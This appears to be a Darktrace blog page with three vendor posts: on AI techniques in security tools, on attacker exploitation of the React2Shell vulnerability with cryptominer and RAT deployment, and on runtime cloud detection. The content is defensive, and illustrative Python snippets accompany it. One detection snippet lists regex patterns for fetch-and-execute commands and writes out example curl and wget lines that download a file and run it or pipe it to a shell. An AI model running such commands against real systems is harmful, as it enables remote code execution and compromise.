February 10, 2025

From Hype to Reality: How AI is Transforming Cybersecurity Practices

AI hype is everywhere, but not many vendors are getting specific. Darktrace’s multi-layered AI combines various machine learning techniques for behavioral analytics, real-time threat detection, investigation, and autonomous response.

AI is everywhere, predominantly because it has changed the way humans interact with data. AI is a powerful tool for data analytics, predictions, and recommendations, but accuracy, safety, and security are paramount for operationalization.

In cybersecurity, AI-powered solutions are becoming increasingly necessary to keep up with modern business complexity and this new age of cyber-threat, marked by attacker innovation, use of AI, speed, and scale. The emergence of these new threats calls for a varied and layered approach in AI security technology to anticipate asymmetric threats.

While many cybersecurity vendors are adding AI to their products, they are not always communicating clearly which capabilities they use or what data those capabilities rely on. This is especially the case with Large Language Models (LLMs). Many products are adding interactive and generative capabilities that do not necessarily increase the efficacy of detection and response, but instead enhance the analyst and security team experience and speed up data retrieval.

Consequently, many people erroneously conflate generative AI with other types of AI. Similarly, only 31% of security professionals report that they are “very familiar” with supervised machine learning, the type of AI most often applied in today’s cybersecurity solutions to identify threats using attack artifacts and facilitate automated responses. This confusion around AI and its capabilities can result in suboptimal cybersecurity measures, overfitting, inaccuracies due to ineffective methods/data, inefficient use of resources, and heightened exposure to advanced cyber threats.

Vendors must cut through the AI market and demystify the technology in their products for safe, secure, and accurate adoption. To that end, let’s discuss common AI techniques in cybersecurity as well as how Darktrace applies them.

Modernizing cybersecurity with AI

Machine learning has presented a significant opportunity to the cybersecurity industry, and many vendors have been using it for years. Despite the high potential benefit of applying machine learning to cybersecurity, not every AI tool or machine learning model is equally effective: effectiveness depends on the technique used, how it is applied, and the data it was trained on.

Supervised machine learning and cybersecurity

Supervised machine learning models are trained on labeled, structured data to automate tasks that humans have previously performed and labeled. Some cybersecurity vendors have been experimenting with supervised machine learning for years, with most automating threat detection based on reported attack data using big data science, shared cyber-threat intelligence, known or reported attack behavior, and classifiers.
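
As a simplified illustration of the approach (not any particular vendor's implementation), the sketch below trains a classifier on a handful of labeled records; the features, values, and labels are invented for the example.

```python
# Minimal sketch of supervised threat classification on labeled attack data.
# Feature names, values, and labels are hypothetical, for illustration only.
import numpy as np
from sklearn.ensemble import RandomForestClassifier

# Each row: [bytes_out, failed_logins, distinct_ports, contacted_known_bad_ip]
X = np.array([
    [1_200,   0,  2, 0],   # benign activity
    [500_000, 12, 40, 1],  # labeled attack (e.g., from shared threat intelligence)
    [2_300,   1,  3, 0],   # benign activity
    [750_000, 30, 85, 1],  # labeled attack
])
y = np.array([0, 1, 0, 1])  # labels supplied by analysts or reported attack data

clf = RandomForestClassifier(n_estimators=50, random_state=0).fit(X, y)

# New traffic is scored against the patterns learned from past, labeled attacks.
print(clf.predict_proba([[600_000, 20, 60, 1]]))
```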

In the last several years, however, more vendors have expanded into behavioral analytics and anomaly detection. In many applications, this method separates the learning phase, when the behavioral profile is created (baselining), from the subsequent anomaly detection. As such, it does not learn continuously and requires periodic updating and re-training to keep up with dynamic business operations and new attack techniques. Unfortunately, this opens the door to a high rate of daily false positives and false negatives.

Unsupervised machine learning and cybersecurity

Unlike supervised approaches, unsupervised machine learning does not require labeled training data or human-led training. Instead, it independently analyzes data to detect compelling patterns without relying on knowledge of past threats. This removes the dependency on human input or involvement to guide learning.

However, it is constrained by its input parameters, requiring thoughtful technique and feature selection to ensure the accuracy of the outputs. Additionally, while these anomaly-focused techniques can discover new patterns in data, some of those patterns may be irrelevant and distracting.

When using such models for behavioral analytics and anomaly detection, the outputs come in the form of anomalies rather than classified threats, requiring additional modeling for threat behavior context and prioritization. Anomaly detection performed in isolation can generate false positives that waste analyst resources.
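
A minimal sketch of this pattern, assuming hypothetical per-device traffic features: an unsupervised model flags statistical outliers, and a simple context check is layered on top before anything is raised as an alert.

```python
# Minimal sketch of unsupervised anomaly detection plus a simple prioritization
# step. The per-device traffic features and thresholds are illustrative assumptions.
import numpy as np
from sklearn.ensemble import IsolationForest

# Rows of [connections_per_hour, mean_bytes_out, distinct_external_hosts]
normal_traffic = np.random.default_rng(0).normal(
    loc=[40, 3_000, 5], scale=[5, 400, 1], size=(500, 3)
)
model = IsolationForest(contamination=0.01, random_state=0).fit(normal_traffic)

new_events = np.array([
    [42, 3_100, 5],      # looks normal
    [400, 90_000, 120],  # anomalous: possible scanning or exfiltration
])
scores = model.decision_function(new_events)  # lower = more anomalous
flags = model.predict(new_events)             # -1 = anomaly, 1 = normal

# Anomalies alone are not threats: add basic threat-behavior context before alerting.
for event, score, flag in zip(new_events, scores, flags):
    if flag == -1 and event[2] > 50:          # e.g., unusually many external hosts
        print(f"Prioritized alert: {event}, anomaly score {score:.3f}")
```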

LLMs and cybersecurity

LLMs are a major aspect of mainstream generative AI, and they can be used in both supervised and unsupervised ways. They are pre-trained on massive volumes of data and can be applied to human language, machine language, and more.

With the recent explosion of LLMs in the market, many vendors are rushing to add generative AI to their products, using it for chatbots, Retrieval-Augmented Generation (RAG) systems, agents, and embeddings. Generative AI in cybersecurity can optimize data retrieval for defenders, summarize reporting, or emulate sophisticated phishing attacks for preventative security.
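
As a toy illustration of the retrieval step in a RAG workflow (using word overlap in place of a real embedding model, with invented alert snippets), the sketch below shows how a natural-language question is grounded in existing security data before an LLM generates an answer.

```python
# Minimal sketch of the retrieval step in a RAG workflow for security data
# retrieval. The scoring function is a toy stand-in for LLM embeddings, and
# the alert snippets are invented for illustration.
def relevance(query: str, doc: str) -> float:
    """Toy relevance score via word overlap; real systems use embedding models."""
    q, d = set(query.lower().split()), set(doc.lower().split())
    return len(q & d) / len(q | d)

alert_snippets = [
    "Device laptop-42 made repeated SMB connections to a rare internal host.",
    "SaaS account j.doe logged in from an unusual country at 03:12 UTC.",
    "Firewall policy updated to allow outbound traffic on port 4444.",
]

query = "which account logged in from an unusual location"
best = max(alert_snippets, key=lambda doc: relevance(query, doc))

# The retrieved snippet is what would be handed to the LLM as grounding context,
# reducing the chance of the model inventing ("hallucinating") details.
print(best)
```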

But because LLMs work through semantic analysis, they can struggle to consistently apply the reasoning required for security analysis and detection. Applied irresponsibly, generative AI can also cause confusion: it can “hallucinate” (reference invented data) when no post-processing is in place to limit the impact, or give conflicting responses because of confirmation bias in the prompts written by different security team members.

Combining techniques in a multi-layered AI approach

Each type of machine learning technique has its own set of strengths and weaknesses, so a multi-layered, multi-method approach is ideal to enhance functionality while overcoming the shortcomings of any one method.

Darktrace’s Self-Learning AI is a multi-layered engine powered by multiple machine learning approaches that operate in combination for cyber defense. This allows Darktrace to protect the entire digital estates of the organizations it secures, including corporate networks, cloud computing services, SaaS applications, IoT, Industrial Control Systems (ICS), and email systems.

Plugged into the organization’s infrastructure and services, our AI engine ingests and analyzes the raw data and its interactions within the environment and forms an understanding of normal behavior, right down to the granular details of specific users and devices. The system continually revises its understanding of what is normal based on evolving evidence, learning continuously rather than relying on periodic baselining.
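
As a highly simplified illustration of continuous learning (not Darktrace's implementation), the sketch below maintains a per-device notion of normal for a single metric that is revised with every new observation, so there is no separate baselining or re-training phase. The metric, smoothing factor, and values are assumptions.

```python
# Minimal sketch of continuously revising a notion of "normal" (here, one metric
# per device) instead of re-training against a fixed baseline.
class OnlineBaseline:
    """Tracks a running mean/variance that is updated with every observation."""

    def __init__(self, alpha: float = 0.05):
        self.alpha = alpha          # how quickly "normal" adapts to new evidence
        self.mean = None
        self.var = 0.0

    def update_and_score(self, value: float) -> float:
        if self.mean is None:       # the first observation seeds the baseline
            self.mean = value
            return 0.0
        deviation = value - self.mean
        # Anomaly score: deviation in units of the current standard deviation.
        score = abs(deviation) / ((self.var ** 0.5) or 1.0)
        # Continuously revise the model of normal (no separate re-training phase).
        self.mean += self.alpha * deviation
        self.var = (1 - self.alpha) * (self.var + self.alpha * deviation ** 2)
        return score

baseline = OnlineBaseline()
for mb_uploaded in [10, 12, 9, 11, 10, 950]:   # sudden large upload at the end
    print(round(baseline.update_and_score(mb_uploaded), 2))
```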

This dynamic understanding of normal, partnered with dozens of anomaly detection models, means that the AI engine can identify, with a high degree of precision, events or behaviors that are both anomalous and unlikely to be benign. Understanding anomalies through the lens of many models, and autonomously fine-tuning those models’ performance, gives us greater confidence in anomaly detection.

The next layer provides event correlation and threat behavior context to understand the risk level of anomalous events. Every anomalous event is investigated by Cyber AI Analyst, which combines unsupervised machine learning models that analyze logs with supervised machine learning trained on how to investigate. This provides anomaly and risk context alongside explainable investigation outcomes.

The ability to identify activity that represents the first footprints of an attacker, without any prior knowledge or intelligence, lies at the heart of the AI system’s efficacy in keeping pace with threat actor innovations and changes in tactics and techniques. It helps the human team detect subtle indicators that can be hard to spot amid the immense noise of legitimate, day-to-day digital interactions. This enables advanced threat detection with full domain visibility.

Digging deeper into AI: Mapping specific machine learning techniques to cybersecurity functions

Visibility and control are vital for the practical adoption of AI solutions, as they build trust between human security teams and their AI tools. That is why we want to share some specific applications of AI across our solutions, moving beyond hype and buzzwords to provide grounded, technical explanations.

Darktrace’s technology helps security teams cover every stage of the incident lifecycle with a range of comprehensive analysis and autonomous investigation and response capabilities.

  1. Behavioral prediction: Our AI understands your unique organization by learning normal patterns of life. It accomplishes this with multiple clustering algorithms, anomaly detection models, a Bayesian meta-classifier for autonomous fine-tuning, graph theory, and more (a simplified sketch of combining such model outputs follows this list).
  2. Real-time threat detection: With a true understanding of normal, our AI engine connects anomalous events to risky behavior using probabilistic models. 
  3. Investigation: Darktrace performs in-depth analysis and investigation of anomalies, in particular automating Level 1 of a SOC team and augmenting the rest of the SOC team through prioritization for human-led investigations. Some of these methods include supervised and unsupervised machine learning models, semantic analysis models, and graph theory.
  4. Response: Darktrace calculates the proportional action to take to neutralize in-progress attacks at machine speed. As a result, organizations are protected 24/7, even when the human team is out of the office. By understanding the normal pattern of life of an asset or peer group, the autonomous response engine can isolate the anomalous or risky behavior and surgically block it. The engine can also enforce the peer group’s pattern of life when rare and risky behavior continues.
  5. Customizable model editor: This layer of customizable logic models tailors our AI’s processing to give security teams more visibility as well as the opportunity to adapt outputs, therefore increasing explainability, interpretability, control, and the ability to modify the operationalization of the AI output with auditing.
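
To illustrate one piece of this, the sketch below shows how several independent anomaly scores could be fused into a single posterior probability, loosely in the spirit of a Bayesian meta-classifier. The model names, scores, and prior are assumptions for illustration, not Darktrace's actual models or parameters.

```python
# Minimal sketch of fusing several anomaly detectors' outputs into a single
# posterior probability, loosely in the spirit of a Bayesian meta-classifier.
# The priors, likelihoods, and model names are illustrative assumptions.
from math import prod

def fuse(model_scores: dict[str, float], prior: float = 0.001) -> float:
    """Naive-Bayes style fusion: each score in [0, 1] is treated as evidence
    for P(observation | threat) versus P(observation | benign)."""
    likelihood_threat = prod(max(s, 1e-6) for s in model_scores.values())
    likelihood_benign = prod(max(1 - s, 1e-6) for s in model_scores.values())
    numerator = likelihood_threat * prior
    return numerator / (numerator + likelihood_benign * (1 - prior))

scores = {
    "rare_external_endpoint": 0.97,
    "unusual_data_volume": 0.97,
    "new_credential_use": 0.90,
    "beaconing_regularity": 0.85,
}
print(f"Posterior probability of threat: {fuse(scores):.3f}")
```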

See the complete AI architecture in the paper “The AI Arsenal: Understanding the Tools Shaping Cybersecurity.”

Figure 1. Alerts can be customized in the model editor in many ways, such as editing the thresholds for rarity and unusualness scores.

Machine learning is the fundamental ally in cyber defense

Traditional security methods, even those that use a small subset of machine learning, are no longer sufficient: they can neither keep up with all possible attack vectors nor respond fast enough to the variety of machine-speed attacks whose complexity exceeds known and expected patterns.

Security teams require advanced detection capabilities, using multiple machine learning techniques to understand the environment, filter the noise, and take action where threats are identified.

Darktrace’s Self-Learning AI comes together to achieve behavioral prediction, real-time threat detection and response, and incident investigation, all while empowering your security team with visibility and control.

Learn how AI is Applied in Cybersecurity

Discover specifically how Darktrace applies different types of AI to improve cybersecurity efficacy and operations in this technical paper.

January 15, 2026

React2Shell Reflections: Cloud Insights, Finance Sector Impacts, and How Threat Actors Moved So Quickly


Introduction

Last month’s disclosure of CVE-2025-55812, known as React2Shell, provided a reminder of how quickly modern threat actors can operationalize newly disclosed vulnerabilities, particularly in cloud-hosted environments.

The vulnerability was discovered on December 3, 2025, with a patch made available on the same day. Within 30 hours of the patch, a publicly available proof-of-concept emerged that could be used to exploit any vulnerable server. This short timeline meant many systems remained unpatched when attackers began actively exploiting the vulnerability.  

Darktrace researchers rapidly deployed a new honeypot to monitor exploitation of CVE-2025-55812 in the wild.

Within two minutes of deployment, Darktrace observed opportunistic attackers exploiting this unauthenticated remote code execution flaw in React Server Components, leveraging a single crafted request to gain control of exposed Next.js servers. Exploitation quickly progressed from reconnaissance to scripted payload delivery, HTTP beaconing, and cryptomining, underscoring how automation and pre‑positioned infrastructure by threat actors now compress the window between disclosure and active exploitation to mere hours.

For cloud‑native organizations, particularly those in the financial sector, where Darktrace observed the greatest impact, React2Shell highlights the growing disconnect between patch availability and attacker timelines, increasing the likelihood that even short delays in remediation can result in real‑world compromise.

Cloud insights

In contrast to traditional enterprise networks built around layered controls, cloud architectures are often intentionally internet-accessible by default. When vulnerabilities emerge in common application frameworks such as React and Next.js, attackers face minimal friction. No phishing campaign, credential theft, or lateral movement is required; only an exposed service and an exploitable condition.

The activity Darktrace observed during the React2Shell intrusions reflects techniques that are familiar yet highly effective in cloud-based attacks. Attackers quickly pivot from an exposed internet-facing application to abusing the underlying cloud infrastructure, using automated exploitation to deploy secondary payloads at scale and ultimately act on their objectives, whether monetizing access through cryptomining or burying themselves deeper in the environment for sustained persistence.

Cloud Case Study

In one incident, opportunistic attackers rapidly exploited an internet-facing Azure virtual machine (VM) running a Next.js application, abusing the React/Next.js vulnerability to gain remote command execution within hours of the service becoming exposed. The compromise resulted in the staged deployment of a Go-based remote access trojan (RAT), followed by a series of cryptomining payloads such as XMRig.

Initial Access

Initial access appears to have originated from abused virtual private network (VPN) infrastructure, with the source IP (146.70.192[.]180) later identified as being associated with Surfshark.

Figure 1: The IP address above is associated with VPN abuse leveraged for initial exploitation via Surfshark infrastructure.

The use of commercial VPN exit nodes reflects a wider trend of opportunistic attackers leveraging low‑cost infrastructure to gain rapid, anonymous access.

Parent process telemetry later confirmed execution originated from the Next.js server, strongly indicating application-layer compromise rather than SSH brute force, misused credentials, or management-plane abuse.

Payload execution

Shortly after successful exploitation, Darktrace identified a suspicious file and its subsequent execution. One of the first payloads retrieved was a binary masquerading as “vim”, a naming convention commonly used to evade casual inspection in Linux environments. This activity directly tied the payload execution to the compromised Next.js application process, reinforcing the hypothesis of exploit-driven access.

Command-and-Control (C2)

Network flow logs revealed outbound connections back to the same external IP involved in the inbound activity. From a defensive perspective, this pattern is significant as web servers typically receive inbound requests, and any persistent outbound callbacks — especially to the same IP — indicate likely post-exploitation control. In this case, a C2 detection model alert was raised approximately 90 minutes after the first indicators, reflecting the time required for sufficient behavioral evidence to confirm beaconing rather than benign application traffic.
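
The sketch below illustrates this kind of logic in simplified form: given flow records for a web server, flag repeated outbound connections to an address that previously appeared as an inbound source. The record format, sample flows, and threshold are assumptions, not Darktrace's detection model.

```python
# Minimal sketch of flagging outbound callbacks to an IP that previously sent
# inbound requests to a web server, using simplified flow records.
# Field names and the flow data are illustrative assumptions.
from collections import Counter

flows = [
    {"src": "146.70.192[.]180", "dst": "10.0.0.5", "direction": "inbound"},   # exploit attempt
    {"src": "10.0.0.5", "dst": "146.70.192[.]180", "direction": "outbound"},  # callback
    {"src": "10.0.0.5", "dst": "146.70.192[.]180", "direction": "outbound"},
    {"src": "10.0.0.5", "dst": "151.101.1[.]140", "direction": "outbound"},   # ordinary fetch
]

inbound_sources = {f["src"] for f in flows if f["direction"] == "inbound"}
outbound_counts = Counter(f["dst"] for f in flows if f["direction"] == "outbound")

for dst, count in outbound_counts.items():
    # Web servers rarely initiate repeated connections back to a prior inbound source.
    if dst in inbound_sources and count >= 2:
        print(f"Possible post-exploitation C2: repeated callbacks to {dst} ({count} flows)")
```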

Cryptominers deployment and re-exploitation

Following successful command execution within the compromised Next.js workload, the attackers rapidly transitioned to monetization by deploying cryptomining payloads. Microsoft Defender observed a shell command designed to fetch and execute a binary named “x” via either curl or wget, ensuring successful delivery regardless of which tooling was available on the Azure VM.

The binary was written to /home/wasiluser/dashboard/x and subsequently executed, with open-source intelligence (OSINT) enrichment strongly suggesting it was a cryptominer consistent with XMRig‑style tooling. Later the same day, additional activity revealed the host downloading a static XMRig binary directly from GitHub and placing it in a hidden cache directory (/home/wasiluser/.cache/.sys/).
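
A simple heuristic sketch of how command lines like these might be flagged is shown below; the example commands, paths, and patterns are illustrative assumptions rather than a reproduction of Defender's or Darktrace's logic.

```python
# Minimal heuristic sketch for flagging fetch-and-execute command lines and
# hidden cache paths like those described above. The example command lines and
# regex patterns are invented for illustration.
import re

SUSPICIOUS_PATTERNS = [
    r"\b(curl|wget)\b.+\|\s*(sh|bash)\b",   # download piped straight into a shell
    r"\b(curl|wget)\b.+&&\s*chmod\s+\+x",   # download, then mark the file executable
    r"/\.cache/\.[A-Za-z0-9_]+/",           # hidden directory nested inside .cache
]

observed_commands = [
    "curl -s http://203.0.113.7/x -o /tmp/x && chmod +x /tmp/x",
    "wget -q https://example.test/payload | sh",
    "ls -la /home/appuser/dashboard",
]

for cmd in observed_commands:
    if any(re.search(pattern, cmd) for pattern in SUSPICIOUS_PATTERNS):
        print(f"Suspicious command line: {cmd}")
```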

The use of trusted infrastructure and legitimate open‑source tooling indicates an opportunistic approach focused on reliability and speed. The repeated deployment of cryptominers strongly suggests re‑exploitation of the same vulnerable web application rather than reliance on traditional persistence mechanisms. This behavior is characteristic of cloud‑focused attacks, where publicly exposed workloads can be repeatedly compromised at scale more easily.

Financial sector spotlight

During the mass exploitation of React2Shell, Darktrace observed targeting by likely North Korea-affiliated actors focused on financial organizations in the United Kingdom, Sweden, Spain, Portugal, Nigeria, Kenya, Qatar, and Chile.

The targeting of the financial sector is not unexpected, but the emergence of new Democratic People’s Republic of Korea (DPRK) tooling, including a Beavertail variant and EtherRAT, a previously undocumented Linux implant, highlights the need to update the detection rules and signatures that organizations rely on.

EtherRAT uses Ethereum smart contracts for C2 resolution, polling every 500 milliseconds and employing five persistence mechanisms. It downloads its own Node.js runtime from nodejs[.]org and queries nine Ethereum RPC endpoints in parallel, selecting the majority response to determine its C2 URL. EtherRAT also overlaps with the Contagious Interview campaign, which has targeted blockchain developers since early 2025.
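
To illustrate the majority-vote resolution described above (this is not EtherRAT's code, and the values are invented), the sketch below picks whichever candidate C2 URL the largest number of queried endpoints agree on.

```python
# Illustrative sketch of majority-vote resolution: query several endpoints and
# take the value most of them agree on. The responses below are invented;
# this is not EtherRAT's code.
from collections import Counter

def resolve_by_majority(responses: list[str]) -> str:
    """Return the value returned by the largest number of endpoints."""
    value, _count = Counter(responses).most_common(1)[0]
    return value

# Hypothetical decoded values returned by nine independent RPC queries;
# one endpoint disagrees (stale or tampered), so the majority wins.
responses = ["hxxp://c2.example[.]test/a"] * 8 + ["hxxp://stale.example[.]test/b"]
print(resolve_by_majority(responses))
```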

Read more finance‑sector insights in Darktrace’s white paper, The State of Cyber Security in the Finance Sector.

Threat actor behavior and speed

Darktrace’s honeypot was exploited just two minutes after coming online. The automated scanning, pre-positioned infrastructure and staging, and C2 infrastructure traced back to “bulletproof” hosting all reflect a mature, well-resourced operational chain.

For financial organizations, particularly those operating cloud‑native platforms, digital asset services, or internet‑facing APIs, this activity demonstrates how rapidly geopolitical threat actors can weaponize newly disclosed vulnerabilities, turning short patching delays into strategic opportunities for long‑term access and financial gain. This underscores the need for a behavioral-anomaly-led security posture.

Credit to Nathaniel Jones (VP, Security & AI Strategy, Field CISO) and Mark Turner (Specialist Security Researcher)

Edited by Ryan Traill (Analyst Content Lead)

Appendices

Indicators of Compromise (IoCs)

146.70.192[.]180 – IP Address – Endpoint Associated with Surfshark

References

https://www.darktrace.com/resources/the-state-of-cybersecurity-in-the-finance-sector

About the author
Nathaniel Jones
VP, Security & AI Strategy, Field CISO

January 13, 2026

Runtime Is Where Cloud Security Really Counts: The Importance of Detection, Forensics and Real-Time Architecture Awareness


Introduction: Shifting focus from prevention to runtime

Cloud security has spent the last decade focused on prevention: tightening configurations, scanning for vulnerabilities, and enforcing best practices through Cloud Native Application Protection Platforms (CNAPP). These capabilities remain essential, but they are not where cloud attacks happen.

Attacks happen at runtime: the dynamic, ephemeral, constantly changing execution layer where applications run, permissions are granted, identities act, and workloads communicate. This is also the layer where defenders traditionally have the least visibility and the least time to respond.

Today’s threat landscape demands a fundamental shift. Reducing cloud risk now requires moving beyond static posture and CNAPP-only approaches and embracing real-time behavioral detection across workloads and identities, paired with the ability to automatically preserve forensic evidence. Defenders need a continuous, real-time understanding of what “normal” looks like in their cloud environments, and AI capable of processing massive data streams to surface deviations that signal emerging attacker behavior.

Runtime: The layer where attacks happen

Runtime is the cloud in motion: containers starting and stopping, serverless functions being called, IAM roles being assumed, workloads auto-scaling, and data flowing across hundreds of services. It’s also where attackers:

  • Weaponize stolen credentials
  • Escalate privileges
  • Pivot programmatically
  • Deploy malicious compute
  • Manipulate or exfiltrate data

The challenge is complex: runtime evidence is ephemeral. Containers vanish; critical process data disappears in seconds. By the time a human analyst begins investigating, the detail required to understand and respond to the alert is often already gone. This volatility makes runtime the hardest layer to monitor, and the most important one to secure.

What Darktrace / CLOUD Brings to Runtime Defense

Darktrace / CLOUD is purpose-built for the cloud execution layer. It unifies the capabilities required to detect, contain, and understand attacks as they unfold, not hours or days later. Four elements define its value:

1. Behavioral, real-time detection

The platform learns normal activity across cloud services, identities, workloads, and data flows, then surfaces anomalies that signify real attacker behavior, even when no signature exists.

2. Automated forensic-level artifact collection

The moment Darktrace detects a threat, it can automatically capture volatile forensic evidence: disk state, memory, logs, and process context, including from ephemeral resources. This preserves the truth of what happened before workloads terminate and evidence disappears.
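
As a rough sketch of the general idea (not Darktrace's implementation), the example below uses the AWS SDK to snapshot a flagged instance's attached volumes the moment a detection fires, so disk state survives even if the workload terminates. The instance and incident identifiers are placeholders.

```python
# Minimal sketch of preserving volatile evidence on detection, using the AWS SDK
# to snapshot a compromised instance's volumes before they can disappear.
# This illustrates the general idea only; it is not Darktrace's implementation.
import boto3

def preserve_disk_state(instance_id: str, incident_id: str, region: str = "us-east-1"):
    ec2 = boto3.client("ec2", region_name=region)
    # Find every volume currently attached to the suspect instance.
    volumes = ec2.describe_volumes(
        Filters=[{"Name": "attachment.instance-id", "Values": [instance_id]}]
    )["Volumes"]
    snapshot_ids = []
    for vol in volumes:
        # Snapshot each volume and tag it so it can be tied back to the incident.
        snap = ec2.create_snapshot(
            VolumeId=vol["VolumeId"],
            Description=f"Forensic capture for incident {incident_id}",
            TagSpecifications=[{
                "ResourceType": "snapshot",
                "Tags": [{"Key": "incident", "Value": incident_id}],
            }],
        )
        snapshot_ids.append(snap["SnapshotId"])
    return snapshot_ids

# Example trigger (placeholder identifiers): snapshot disks as soon as an alert fires.
# preserve_disk_state("i-0123456789abcdef0", incident_id="INC-42")
```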

3. AI-led investigation

Cyber AI Analyst assembles cloud behaviors into a coherent incident story, correlating identity activity, network flows, and cloud workload behavior. Analysts no longer need to pivot across dashboards or reconstruct timelines manually.

4. Live architectural awareness

Darktrace continuously maps your cloud environment as it operates, including services, identities, connectivity, and data pathways. This real-time visibility makes anomalies clearer and investigations dramatically faster.

Together, these capabilities form a runtime-first security model.

Why CNAPP alone isn’t enough

CNAPP platforms excel at pre-deployment checks, all the way down to developer workstations: identifying misconfigurations, concerning permission combinations, vulnerable images, and risky infrastructure choices. But CNAPP’s breadth is also its limitation: CNAPP is about posture, while runtime defense is about behavior.

CNAPP tells you what could go wrong; runtime detection highlights what is going wrong right now.

CNAPP cannot preserve ephemeral evidence, correlate active behaviors across domains, or contain unfolding attacks with the precision and speed required during a real incident. Prevention remains essential, but prevention alone cannot stop an attacker who is already operating inside your cloud environment.

Real-world AWS Scenario: Why Runtime Monitoring Wins

A recent incident detected by Darktrace / CLOUD highlights how cloud compromises unfold, and why runtime visibility is non-negotiable. Each step below reflects detections that occur only when monitoring behavior in real time.

1. External Credential Use

Detection: Unusual external source for credential use: An attacker logs into a cloud account from a never-before-seen location, the earliest sign of account takeover.

2. AWS CLI Pivot

Detection: Unusual CLI activity: The attacker switches to programmatic access, issuing commands from a suspicious host to gain automation and stealth.

3. Credential Manipulation

Detection: Rare password reset: They reset or assign new passwords to establish persistence and bypass existing security controls.

4. Cloud Reconnaissance

Detection: Burst of resource discovery: The attacker enumerates buckets, roles, and services to map high value assets and plan next steps.

5. Privilege Escalation

Detection: Anomalous IAM update: Unauthorized policy updates or role changes grant the attacker elevated access or a backdoor.

6. Malicious Compute Deployment

Detection: Unusual EC2/Lambda/ECS creation: The attacker deploys compute resources for mining, lateral movement, or staging further tools.

7. Data Access or Tampering

Detection: Unusual S3 modifications: They alter S3 permissions or objects, often a prelude to data exfiltration or corruption.

Only some of these actions would appear in a posture scan, and crucially only after the fact. Every one of these runtime detections is visible only through real-time behavioral monitoring while the attack is in progress.
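
The sketch below shows, in highly simplified form, how a few of these signals could be derived from CloudTrail events. The event structure is reduced to two fields and the set of "known" source IPs stands in for a learned behavioral profile; it is illustrative only, not how Darktrace / CLOUD works.

```python
# Minimal sketch of deriving a few of the runtime signals above from CloudTrail
# events. Event records are simplified and the baseline of "seen" IPs is a
# stand-in for a learned behavioral profile.
SENSITIVE_EVENTS = {
    "PutUserPolicy", "AttachRolePolicy", "UpdateAssumeRolePolicy",  # privilege escalation
    "RunInstances", "CreateFunction",                               # malicious compute
    "PutBucketAcl", "PutBucketPolicy",                              # S3 tampering
}

known_source_ips = {"198.51.100.10"}   # learned "normal" sources for this identity

def triage(event: dict):
    name, source_ip = event["eventName"], event["sourceIPAddress"]
    if name == "ConsoleLogin" and source_ip not in known_source_ips:
        return f"Unusual external source for credential use: {source_ip}"
    if name in SENSITIVE_EVENTS and source_ip not in known_source_ips:
        return f"Anomalous sensitive API call {name} from {source_ip}"
    return None

events = [
    {"eventName": "ConsoleLogin", "sourceIPAddress": "203.0.113.50"},
    {"eventName": "AttachRolePolicy", "sourceIPAddress": "203.0.113.50"},
    {"eventName": "RunInstances", "sourceIPAddress": "203.0.113.50"},
    {"eventName": "ListBuckets", "sourceIPAddress": "198.51.100.10"},
]
for ev in events:
    alert = triage(ev)
    if alert:
        print(alert)
```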

The future of cloud security Is runtime-first

Cloud defense can no longer revolve solely around prevention. Modern attacks unfold in runtime, across a fast-changing mesh of workloads, services, and, critically, identities. To reduce risk, organizations must be able to detect, understand, and contain malicious activity as it happens, before ephemeral evidence disappears and before attackers pivot across identity layers.

Darktrace / CLOUD delivers this shift by turning runtime, the most volatile and consequential layer in the cloud, into a fully defensible control point through unified visibility across behavior, workloads, and identities. It does this by providing:

  • Real-time behavior detection across workloads and identity activity
  • Autonomous response actions for rapid containment
  • Automated forensic-level artifact preservation the moment events occur
  • AI-driven investigation that separates weak signals from true attacker patterns
  • Live cloud environment insight to understand context and impact instantly

Cloud security must evolve from securing what might go wrong to continuously understanding what is happening: in runtime, across identities, and at the speed attackers operate. Unifying runtime and identity visibility is how defenders regain the advantage.

About the author
Adam Stevens
Senior Director of Product, Cloud | Darktrace